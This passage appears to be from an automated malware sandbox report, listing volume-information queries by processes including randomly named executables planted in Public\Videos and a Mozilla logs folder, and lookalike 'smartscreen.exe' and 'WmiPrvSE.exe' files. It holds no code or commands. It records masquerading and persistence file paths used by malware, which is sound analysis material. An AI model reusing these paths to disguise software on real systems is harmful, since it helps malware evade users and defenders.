                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exeQueries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
                            Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
